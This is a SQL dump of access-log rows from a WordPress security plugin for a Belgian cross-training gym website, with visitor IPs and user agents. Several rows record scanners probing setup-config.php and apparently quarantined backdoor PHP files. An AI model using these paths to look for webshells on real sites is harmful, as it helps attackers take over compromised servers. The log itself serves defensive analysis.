(76016, 1498295398.941872, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76017, 1498295407.221433, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76018, 1498295414.797243, 1834609551, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76019, 1498295415.947689, 1834609551, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(76020, 1498297317.104747, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/new/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76021, 1498297317.105488, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/blogs/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76022, 1498297317.632070, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/beta/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76023, 1498297317.633179, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/news/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76024, 1498297318.015850, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/blog/wordpress/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76025, 1498306847.776264, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/xml_rpc.class.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76026, 1498311277.581544, 2513094943, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/pdo.inc.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/pdo.inc.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76027, 1498314157.628274, 3475901901, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76028, 1498317050.937379, 633042990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/administrator/', '', ''),
(76029, 1498317051.631488, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', ''),
(76030, 1498317051.954384, 633042990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', ''),
(76031, 1498317052.563545, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', ''),
(76032, 1498317053.000067, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', ''),
(76033, 1498317053.388446, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', ''),
(76034, 1498317053.801056, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', ''),
(76035, 1498317054.177310, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', ''),
(76036, 1498317054.576406, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', ''),
(76037, 1498317055.058158, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/hello-world/', '', ''),
(76038, 1498317055.493179, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', ''),
(76039, 1498317055.824437, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', ''),
(76040, 1498317056.197791, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', ''),
(76041, 1498317056.502234, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', ''),
(76042, 1498317056.808468, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/feed/', '', ''),
(76043, 1498317057.115019, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', ''),
(76044, 1498317057.416186, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', ''),
(76045, 1498317057.720573, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', ''),
(76046, 1498317058.026084, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/author/admin/', '', ''),
(76047, 1498317058.365069, 633042990, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/hello-world/#respond', '', ''),
(76048, 1498317058.664831, 633042990, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', ''),
(76049, 1498320952.003502, 1475494060, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/paypal-donation-button/paypal-donation-button.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76050, 1498323123.262608, 774130777, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/maill.php', 'http://crosstrainingcenter.be/maill.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76051, 1498324473.620374, 2917938538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/edqvbo.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/edqvbo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76052, 1498328930.900642, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(76053, 1498329006.104936, 3275627538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/maint/popup-pomo.php', 'http://crosstrainingcenter.be/maint/popup-pomo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76054, 1498329043.358718, 3275627538, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/maint/popup-pomo.php', 'http://crosstrainingcenter.be/maint/popup-pomo.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76055, 1498329670.172736, 1475494071, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/look.php.suspected', 'http://crosstrainingcenter.be/look.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76056, 1498331664.458766, 520974918, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76057, 1498331664.448744, 520974922, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76058, 1498331664.462551, 520974913, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76059, 1498331664.464388, 520974922, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76060, 1498331674.050280, 1121751542, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATOdZQmnJ6AkMlTGKU4akywYv-HpD7Kx_kkZySna8ESN7t6nK4Zs7nD6CcxAi5we67MA-oQpPrw9Pv13vCAoT34CNDUolaPm0FuNWz4vr1M', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36'),
(76061, 1498331691.021619, 1121751542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36'),
(76062, 1498332207.866596, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76063, 1498332716.039177, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76064, 1498333214.002352, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76065, 1498333698.428208, 758636621, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)'),
(76066, 1498333715.026423, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76067, 1498334200.918040, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76068, 1498334670.573112, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76069, 1498335163.284840, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76070, 1498335645.849147, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76071, 1498336104.718198, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76072, 1498336578.857309, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76073, 1498337051.871537, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76074, 1498337284.026178, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76075, 1498337527.029100, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76076, 1498337983.563622, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76077, 1498338015.192930, 3104081691, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/viewport-compatible.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/viewport-compatible.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76078, 1498338143.948189, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76079, 1498338457.254362, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76080, 1498338822.832639, 632837775, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76081, 1498338823.603158, 632837775, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76082, 1498338824.199501, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76083, 1498338824.669252, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76084, 1498338825.129597, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76085, 1498338825.804344, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76086, 1498338826.610757, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76087, 1498338827.113264, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76088, 1498338827.617272, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76089, 1498338828.050573, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76090, 1498338828.478529, 632837775, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76091, 1498338928.876753, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76092, 1498338928.876754, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76093, 1498339370.214025, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76094, 1498339832.498876, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76095, 1498340283.093724, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76096, 1498342363.434258, 1753276934, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-form-ajax.php.suspected', 'http://crosstrainingcenter.be/wp-form-ajax.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76097, 1498348039.925921, 1541139809, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.02.49 (KHTML, like Gecko) Chrome/57.4.9071.4708 Safari/533.32'),
(76098, 1498348047.881172, 1541139809, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.02.49 (KHTML, like Gecko) Chrome/57.4.9071.4708 Safari/533.32'),
(76099, 1498358225.110233, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76100, 1498365325.772971, 1311686202, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/ajax-requests.new.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76101, 1498365559.977278, 1123631300, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(76102, 1498371548.148877, 1538512053, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(76103, 1498371550.072558, 1538512053, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(76104, 1498371703.917982, 3024883475, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76105, 1498371704.444517, 3024883483, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(76106, 1498373703.674665, 3024883618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76107, 1498375362.982192, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76108, 1498375363.800755, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76109, 1498375364.222519, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76110, 1498375364.671332, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76111, 1498375365.241133, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76112, 1498375365.672449, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76113, 1498375366.111291, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76114, 1498375366.994780, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76115, 1498375367.524259, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76116, 1498375368.131610, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76117, 1498375368.645680, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76118, 1498375369.286437, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76119, 1498375369.764507, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76120, 1498375370.198607, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76121, 1498376142.946227, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(76122, 1498376143.476184, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76123, 1498376143.934753, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76124, 1498376144.458899, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76125, 1498376145.015531, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76126, 1498376145.491740, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76127, 1498376145.983630, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76128, 1498376146.492050, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76129, 1498376147.014736, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76130, 1498376147.469955, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76131, 1498376147.913556, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76132, 1498376148.486649, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76133, 1498376148.941239, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76134, 1498376149.380231, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(76135, 1498379575.381642, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76136, 1498383846.311388, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76137, 1498383847.504639, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76138, 1498390291.830813, 1538615370, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox/https/www.google.com', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76139, 1498390293.839583, 1538615370, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76140, 1498391195.915717, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76141, 1498391788.980218, 1571470175, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/db_model.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
